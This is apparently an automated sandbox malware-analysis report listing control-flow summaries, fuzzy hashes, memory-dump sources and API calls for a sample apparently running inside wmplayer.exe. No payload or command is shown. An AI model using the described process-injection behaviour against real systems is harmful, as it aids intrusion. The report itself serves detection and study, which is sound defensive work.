• String ID: 0Bs4
• API String ID: 0-2279055507
• Opcode ID: 9a237f526d71a08f72e90e6d316155c2b90d24bfac59d782538576cebfb427b0
• Instruction ID: a0416e68e1fd1da43a58d261694bcf136cbb36a0c9ac231ec1dd65d8e4e1e810
• Opcode Fuzzy Hash: 9a237f526d71a08f72e90e6d316155c2b90d24bfac59d782538576cebfb427b0
• Instruction Fuzzy Hash: 2C52B231A0DB994FE786DF2888A45A47FF1EF57300B0941FBD189CB2A3DA2CA845D751

Control-flow Graph

Control-flow graph (rendered graph image not reproduced): function starting at 7ffd34681048, basic blocks through 7ffd34682c71; internal calls to 7ffd34681040 and 7ffd34681060; no Windows API calls in the graph.
Strings
Memory Dump Source
• Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
• Opcode ID: cee156e573884a12719e2dac8ddd26d348ca65bde35be749a1c6a5c1a98fcd42
• Instruction ID: 4b083605870220e1d44325ccd1527917b63105b77d23c4f802c36bfb8683f8fb
• Opcode Fuzzy Hash: cee156e573884a12719e2dac8ddd26d348ca65bde35be749a1c6a5c1a98fcd42
• Instruction Fuzzy Hash: 4F223171B0CB5A4FE7A9DF28D8A15B177E0EF52314B1442BAC19BC3197DA29F8438780

Control-flow Graph

Control-flow graph (rendered graph image not reproduced): function starting at 7ffd34760003, basic blocks through 7ffd34760708; no internal calls and no Windows API calls in the graph.
Strings
Memory Dump Source
• Source File: 00000000.00000002.2461131384.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34760000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: A
• API String ID: 0-3554254475
• Opcode ID: d4a2e250867127cf1008fed6f9283142df142fdf835ccb8936a4b3dc4ce3f409
• Instruction ID: 330800135f36ee99c023ee2f3215427cdfcf4699a21926b1fe421ed80fc6198a
• Opcode Fuzzy Hash: d4a2e250867127cf1008fed6f9283142df142fdf835ccb8936a4b3dc4ce3f409
• Instruction Fuzzy Hash: 1D32E5B290E7C68FE756CB2888A55A47FE1EF53320B0905FBD189CB193DA1C7806D791

Control-flow Graph

Control-flow graph (rendered graph image not reproduced): function starting at 7ffd34681cc0, basic blocks through 7ffd34684f16; internal calls to 7ffd34684890, 7ffd346848e0, 7ffd34684108, 7ffd34684128; no Windows API calls in the graph.
Strings
Memory Dump Source
• Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
• Opcode ID: 91dcfa450e3c158352e773d0ac9323213695bddad5be7e4274708c42db438bd1
• Instruction ID: 07a54f2ad488cd7e6e37d58eddf010fc2c9067c110e6c897e5c9ff6da9cf74c3
• Opcode Fuzzy Hash: 91dcfa450e3c158352e773d0ac9323213695bddad5be7e4274708c42db438bd1
• Instruction Fuzzy Hash: 6A124431B0CA494FE799DF2894E15B177E0EF92314B1442BAD58EC7197EE28F8428780
Memory Dump Source
• Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c3c47b210162f459ad51f171bdd37699569913bb027cbf909414043ebe0bfe99
• Instruction ID: 17dcf09fada546f52e43244b49eb1a701d0d36cfcb60065fd3e5a2474265e7da
• Opcode Fuzzy Hash: c3c47b210162f459ad51f171bdd37699569913bb027cbf909414043ebe0bfe99
• Instruction Fuzzy Hash: 4EC25431A0CAA64FE769CF2488A11F577E1FF92310F1441BED58ECB593DA6CA846D780
Memory Dump Source
• Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 66d472424de741cfccbd20bf2ba6c2d5d34ee9190f8165b9d273eea7bcbb2929
• Instruction ID: cad2b93238bdd7515ad79ccafb16b896ebe7cb85abd01aaf26991d72ae4b517c
• Opcode Fuzzy Hash: 66d472424de741cfccbd20bf2ba6c2d5d34ee9190f8165b9d273eea7bcbb2929
• Instruction Fuzzy Hash: 0472563160CB6A4FE399DF28C4A15F577E1FF96300B1046BED58AC7296DE28E846C781
Memory Dump Source
• Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 100453dd443fef79ac973b7ad7db3df8e99593a991cb512be9c8b306694d0267
• Instruction ID: 3668a554ce7f9d2b6267f40b891224f91bb2d18bc421b0d20daeff41fe47251f
• Opcode Fuzzy Hash: 100453dd443fef79ac973b7ad7db3df8e99593a991cb512be9c8b306694d0267
• Instruction Fuzzy Hash: 2342C671B08A194FDBA8DF28D4A56B977E1FF59301F1401BEE08EC7293DE28AC429751
Memory Dump Source
• Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3139e50746c09d869d59be10ae5df27f364b41ea70092ea17b2b4f245f23ab0d
• Instruction ID: 0dd6c96da7afd9bd3f8f8183c7ea27df6e54d3981fe739573040f8b29323547e
• Opcode Fuzzy Hash: 3139e50746c09d869d59be10ae5df27f364b41ea70092ea17b2b4f245f23ab0d
• Instruction Fuzzy Hash: ECF15A31A0CBA64FE399CF2888E15B577D2FF92301B14467ED5CAC72A2DD2CA442D781
Memory Dump Source
• Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 463156bdc64818db080c3fe878d5014f6d2e42172e59eab6bee82d981fd7647c
• Instruction ID: 2e44ca99c603217a9ec704a753583574721d87a30c901210c6eee54fe83f0e75
• Opcode Fuzzy Hash: 463156bdc64818db080c3fe878d5014f6d2e42172e59eab6bee82d981fd7647c
• Instruction Fuzzy Hash: 81516832B0C75A0FE76D9E7888651B57BE1EB83310B05827FD08BC7697DD28A8468391

Control-flow Graph

Control-flow graph (rendered graph image not reproduced): function starting at 7ffd3468350a, basic blocks through 7ffd3468361f; the block 7ffd3468353e-7ffd346835ef calls the Windows API VirtualProtect.
APIs
Memory Dump Source
• Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: f9be979bef19bd5ab663b47a733f24f502624efffbdecf5185bfad4a79495885
• Instruction ID: cd88abf323c65619e171b5c21e56360c0d77613f13379f5848b268de6e36ea64
• Opcode Fuzzy Hash: f9be979bef19bd5ab663b47a733f24f502624efffbdecf5185bfad4a79495885
• Instruction Fuzzy Hash: B5412A3090CB884FD719DBA898566E97FF1EF57321F0442AFD049C3192CB696856C792

Control-flow Graph

Control-flow graph (rendered graph image not reproduced): function starting at 7ffd34680921, basic blocks through 7ffd346809fb; the block 7ffd34680921-7ffd346809cc calls the Windows API FreeConsole.
APIs
Memory Dump Source
• Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
Similarity
• API ID: ConsoleFree
• String ID:
• API String ID: 771614528-0
• Opcode ID: 0783ab2059d0b3ec9ccd81e58a5a9114abea6deff02638c6fdf2c5cb48973d67
• Instruction ID: b8459cff84d9ac177bb460160e7e139fd1a74a07bc2dfce965df4a607cc1d4ad
• Opcode Fuzzy Hash: 0783ab2059d0b3ec9ccd81e58a5a9114abea6deff02638c6fdf2c5cb48973d67
• Instruction Fuzzy Hash: 1931C43150CB488FDB65DFA8C856BEA7BF4EF56320F04416FD089C3552DB68A846CB51
Memory Dump Source
• Source File: 00000000.00000002.2461131384.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34760000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 347b3325ba73ef1e37d267398c75f2db8a7207cc8ea119eaeb392a0db7c7c2ea
• Instruction ID: e1535ac52f01d7f75dca4e0b52a338439279de93ca11af81b93c5ef0b2ea166c
• Opcode Fuzzy Hash: 347b3325ba73ef1e37d267398c75f2db8a7207cc8ea119eaeb392a0db7c7c2ea
• Instruction Fuzzy Hash: 77C12CB2A0DB858FE752DB2C88AA1A47FE1FF56320B0901BAD5C9C7593D91C7806D3D1
Memory Dump Source
• Source File: 00000000.00000002.2461131384.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34760000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8a7df844215f3eb9a7404517d46040bb79dba4596461a4959de87e5126f214af
• Instruction ID: fa0d509c3395de2608f46a9e7d4eb6b6b6d56faad242061d8deff36c03a40d09
• Opcode Fuzzy Hash: 8a7df844215f3eb9a7404517d46040bb79dba4596461a4959de87e5126f214af
• Instruction Fuzzy Hash: FB51D471A08A898FDB69DF18C8E16A877E2FF65314F1401AEC10AC7186DF3CB845DB80
Memory Dump Source
• Source File: 00000000.00000002.2461131384.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34760000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 48db7f160d7d5f727eedd961ed629a4995b39a1c17eed555425722c454b6fd2d
• Instruction ID: 1b028a8c354a3a98ecac9bb227c361b8b679e2fe5ef8598827241e0042c09acd
• Opcode Fuzzy Hash: 48db7f160d7d5f727eedd961ed629a4995b39a1c17eed555425722c454b6fd2d
• Instruction Fuzzy Hash: A5E01A30A046288EDF60DB48DC81BD9B3B1FB89300F0041E5D54DE3241CA306A84CF42
Strings
Memory Dump Source
• Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: @Os4$L_^$L_^$L_^$L_^$L_^$L_^$L_S$POs4
• API String ID: 0-2269739461
• Opcode ID: 616452db6e52f0ab3bc6c91dba55e0e22bcfd1adcf6412b134117b961dd0340b
• Instruction ID: 2d73290171fe76c81056cf5b9c84c43ab2d41586898f814a95f5a2546a4716cc
• Opcode Fuzzy Hash: 616452db6e52f0ab3bc6c91dba55e0e22bcfd1adcf6412b134117b961dd0340b
• Instruction Fuzzy Hash: 5B12C9A3E0D6A20BE7526BBC98F50F73B94EF6326C70C10F6D2DC9A093ED1D640A5645
Strings
Memory Dump Source
• Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: gfff
• API String ID: 0-1553575800
• Opcode ID: f423c8f2a46527160002898adc4d8e634b45daa83ab3dce9ee6be51f7f0ca5f9
• Instruction ID: 7f42c98bc5e2f23ed9450e6978b8c6702415ac0f09eac1b2cad4cf44ff6c667a
• Opcode Fuzzy Hash: f423c8f2a46527160002898adc4d8e634b45daa83ab3dce9ee6be51f7f0ca5f9
• Instruction Fuzzy Hash: E051233260D7950FD31A8A7D5C560A17FE6DB8322070A82FFD5C6CB1A7E9596C0BC392

                                              Execution Graph

                                              Execution Coverage:1.5%
                                              Dynamic/Decrypted Code Coverage:4.7%
                                              Signature Coverage:8.1%
                                              Total number of Nodes:149
                                              Total number of Limit Nodes:15

                                              Control-flow Graph

                                              control_flow_graph 43 4175a3-4175bf 44 4175c7-4175cc 43->44 45 4175c2 call 42dda3 43->45 46 4175d2-4175e0 call 42e2c3 44->46 47 4175ce-4175d1 44->47 45->44 50 4175f0-417601 call 42c703 46->50 51 4175e2-4175ed call 42e563 46->51 56 417603-417617 LdrLoadDll 50->56 57 41761a-41761d 50->57 51->50 56->57
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417615
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: c446cb2edfd4bcdd7cc2d2bf9357a6dd86f30088194d3250fb6f131875f8d2ce
                                              • Instruction ID: 5d08c72099d3dbde0b51c66012d470f39d4ef48f62ca1c3c6c9939ae70570b0e
                                              • Opcode Fuzzy Hash: c446cb2edfd4bcdd7cc2d2bf9357a6dd86f30088194d3250fb6f131875f8d2ce
                                              • Instruction Fuzzy Hash: 830121B5E0420DBBDF10DBE5DC42FDEB3B89B54308F00859AE90897240F635EB548B95

                                              Control-flow Graph

                                              control_flow_graph 74 42b163-42b19f call 4047c3 call 42c213 NtClose
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 834ca95e8c7c874dcc3c86e31a2b99fa2e957ab27539cd0c93db527c1b6d8bda
                                              • Instruction ID: 94777ef20ef518cb4d08996e308a4c9858104ec833bab855de29d4310d2d073e
                                              • Opcode Fuzzy Hash: 834ca95e8c7c874dcc3c86e31a2b99fa2e957ab27539cd0c93db527c1b6d8bda
                                              • Instruction Fuzzy Hash: 8BE04F326402147BD660AB9ADC41F9B776DDBC5754F10801AFA0867142CAB4790487B5

                                              Control-flow Graph

                                              control_flow_graph 91 33135c0-33135cc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 0586f5fc49bc15c193759133553318dd32e8898772b328197d5b8290e5b2ad85
                                              • Instruction ID: a660a1f62713a2171568816381a008f9d7639f1f026919283d8cc93732109939
                                              • Opcode Fuzzy Hash: 0586f5fc49bc15c193759133553318dd32e8898772b328197d5b8290e5b2ad85
                                              • Instruction Fuzzy Hash: 1290023561551802D100B15C4555706140587D0201F66C411A0424968D8B958A5165A2

                                              Control-flow Graph

                                              control_flow_graph 88 3312b60-3312b6c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: aed1b1310cdcbb3b7cfa9cc30a41f20d728532a9bf35beef95604b5cf5881c91
                                              • Instruction ID: e473d8c33a42e1db2a86637cb561f0a9a8299d8a757c9949472631ee6ff58dc3
                                              • Opcode Fuzzy Hash: aed1b1310cdcbb3b7cfa9cc30a41f20d728532a9bf35beef95604b5cf5881c91
                                              • Instruction Fuzzy Hash: 35900275212414034105B15C4455616440A87E0201B56C021E1014990DCA2589916125

                                              Control-flow Graph

                                              control_flow_graph 90 3312df0-3312dfc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8115d99ce51aa62b50a2ad0acca0fdf4122e173c523fd07a0e577ff0e552772a
                                              • Instruction ID: c86c6d0f424a17ba75f4ad480afc5ba5d079f911cee66643981a0fd03e5dbeaf
                                              • Opcode Fuzzy Hash: 8115d99ce51aa62b50a2ad0acca0fdf4122e173c523fd07a0e577ff0e552772a
                                              • Instruction Fuzzy Hash: 9790023521141813D111B15C4545707040987D0241F96C412A0424958D9B568A52A121

                                              Control-flow Graph

                                              control_flow_graph 89 3312c70-3312c7c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 29dde4663fd634ded9d2a8dbf859254ad2c0625c7b16e53f64376662d3190525
                                              • Instruction ID: e01206770895e471646b0fd8ad0174c716a96f8a22702ec9cec533bb15e99392
                                              • Opcode Fuzzy Hash: 29dde4663fd634ded9d2a8dbf859254ad2c0625c7b16e53f64376662d3190525
                                              • Instruction Fuzzy Hash: DC90023521149C02D110B15C844574A040587D0301F5AC411A4424A58D8B9589917121

                                              Control-flow Graph

                                              APIs
                                              • PostThreadMessageW.USER32(c23yo28O4,00000111,00000000,00000000), ref: 00413C40
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID: c23yo28O4$c23yo28O4
                                              • API String ID: 1836367815-3151844675
                                              • Opcode ID: 711709d2267b69b9b56d911ec9c934cd4a2ad43c544ea22a81b19540be7437f5
                                              • Instruction ID: c023f9eb8de3e71753128f9afae4a8744ab15f90d3ef21adad86f863b3564a78
                                              • Opcode Fuzzy Hash: 711709d2267b69b9b56d911ec9c934cd4a2ad43c544ea22a81b19540be7437f5
                                              • Instruction Fuzzy Hash: F7112B71E4521876EB20AA91DC02FDF7B7C9F81B58F008069FB147B2C1E6B857068BE5

                                              Control-flow Graph

                                              APIs
                                              • PostThreadMessageW.USER32(c23yo28O4,00000111,00000000,00000000), ref: 00413C40
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID: c23yo28O4$c23yo28O4
                                              • API String ID: 1836367815-3151844675
                                              • Opcode ID: 90abb6b130caa16273304346ba0cc400d8ed268c403604587ceb24bfe58e5115
                                              • Instruction ID: 2ee58dd9a766312a1d0a4e92cdbfa478a3eff213c7b34c8ead5b90bd152a33b3
                                              • Opcode Fuzzy Hash: 90abb6b130caa16273304346ba0cc400d8ed268c403604587ceb24bfe58e5115
                                              • Instruction Fuzzy Hash: 7701D671E4521876EB21AA91DC02FDF7B7C9F41B54F008069FB147B281E6B857068BE5

                                              Control-flow Graph

                                              control_flow_graph 38 42b4c3-42b504 call 4047c3 call 42c213 RtlFreeHeap
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B4FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: QcA
                                              • API String ID: 3298025750-3711227127
                                              • Opcode ID: 52387f6b391afa9524378a867dcb8953b33c653ce9c9427cc4ce448ed0c6e72c
                                              • Instruction ID: 851bf7ecfc53e67bf59877b010cc35dcbf0d875e6266b59784c7832328102d5c
                                              • Opcode Fuzzy Hash: 52387f6b391afa9524378a867dcb8953b33c653ce9c9427cc4ce448ed0c6e72c
                                              • Instruction Fuzzy Hash: 5FE06DB1604205BBD610EE99EC81FAB37ADDFC9710F004029FA08A7242DB74B9108AB9

                                              Control-flow Graph

                                              control_flow_graph 58 417649-417652 59 417654-41766b 58->59 60 4175ed-417601 call 42c703 58->60 64 417646 59->64 65 41766d 59->65 67 417603-417617 LdrLoadDll 60->67 68 41761a-41761d 60->68 64->58 65->65 67->68
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417615
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: b0953560f6e97a0f6bf1c2106018207f46967e55517a7a0063b1d7662908e1d6
                                              • Instruction ID: 7ba332da1f44ace5ef9f5db375416641dd8a3bd251ab81bc5c3b061f369dffe3
                                              • Opcode Fuzzy Hash: b0953560f6e97a0f6bf1c2106018207f46967e55517a7a0063b1d7662908e1d6
                                              • Instruction Fuzzy Hash: D8F04C71A445096FDF00CBA4CC81FEDB7B0EB95314F408B55D914971C1E630DA868B81

                                              Control-flow Graph

                                              control_flow_graph 69 42b473-42b4b7 call 4047c3 call 42c213 RtlAllocateHeap
                                              APIs
                                              • RtlAllocateHeap.NTDLL(?,0041DDDB,?,?,00000000,?,0041DDDB,?,?,?), ref: 0042B4B2
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 9a337b64ec47390a7d24a68222b7cd939cb2c90c9cc0e486826a2a48bc497499
                                              • Instruction ID: 919647529a804f162326e76d8678589544dedf5e8d0bbe49049d2f73312e9cab
                                              • Opcode Fuzzy Hash: 9a337b64ec47390a7d24a68222b7cd939cb2c90c9cc0e486826a2a48bc497499
                                              • Instruction Fuzzy Hash: 50E06D756442057BD610EE99DC81F9B73ACEFC5710F004419FA1CA7242C670B9108AB5

                                              Control-flow Graph

                                              control_flow_graph 79 42b513-42b54c call 4047c3 call 42c213 ExitProcess
                                              APIs
                                              • ExitProcess.KERNEL32(?,00000000,?,?,2ACAF52E,?,?,2ACAF52E), ref: 0042B547
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 154f4f7aa3232ef432045ca40a0bd76ef0ef0f5d485d579874c7ec4e1bf8844a
                                              • Instruction ID: 76d58355d569976f8bb3094186e29b1597798a054e1ffe9f7571adeae244c507
                                              • Opcode Fuzzy Hash: 154f4f7aa3232ef432045ca40a0bd76ef0ef0f5d485d579874c7ec4e1bf8844a
                                              • Instruction Fuzzy Hash: C3E086756102147BD520FB9ADC41F9B775DDFC5714F004119FA18A7142C7B1BA1187F4

                                              Control-flow Graph

                                              control_flow_graph 84 3312c0a-3312c0f 85 3312c11-3312c18 84->85 86 3312c1f-3312c26 LdrInitializeThunk 84->86
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 83640d807008118239bb1eeeb6e76212c3ce4abb0cf836cd9fe838cc6d101f62
                                              • Instruction ID: 8392e7100516da9b91d4aede6b2c0bf4a2de455b29fcd00f2bfbe7a0b7123e25
                                              • Opcode Fuzzy Hash: 83640d807008118239bb1eeeb6e76212c3ce4abb0cf836cd9fe838cc6d101f62
                                              • Instruction Fuzzy Hash: 75B09B719015D5C6DA15E7644A497177D0467D0701F1AC461D3034641E4739C1D1E175
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-2160512332
                                              • Opcode ID: a25f2cbef6c99a989828521aa5e8e9d99edf8b7159409453dcd15da37e3aa179
                                              • Instruction ID: e051f65b254763810e8fa08c4fe466643cea305e78ce2b4092f663e98439b76b
                                              • Opcode Fuzzy Hash: a25f2cbef6c99a989828521aa5e8e9d99edf8b7159409453dcd15da37e3aa179
                                              • Instruction Fuzzy Hash: 9D925775618341AFE724DE24C880F6BB7E8BB88754F084D2DFA95DB251D770E884CB92
                                              Strings
                                              • Invalid debug info address of this critical section, xrefs: 033454B6
                                              • Thread identifier, xrefs: 0334553A
                                              • undeleted critical section in freed memory, xrefs: 0334542B
                                              • 8, xrefs: 033452E3
                                              • double initialized or corrupted critical section, xrefs: 03345508
                                              • Critical section address., xrefs: 03345502
                                              • Thread is in a state in which it cannot own a critical section, xrefs: 03345543
                                              • Address of the debug info found in the active list., xrefs: 033454AE, 033454FA
                                              • Critical section address, xrefs: 03345425, 033454BC, 03345534
                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0334540A, 03345496, 03345519
                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 033454CE
                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 033454E2
                                              • Critical section debug info address, xrefs: 0334541F, 0334552E
                                              • corrupted critical section, xrefs: 033454C2
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                              • API String ID: 0-2368682639
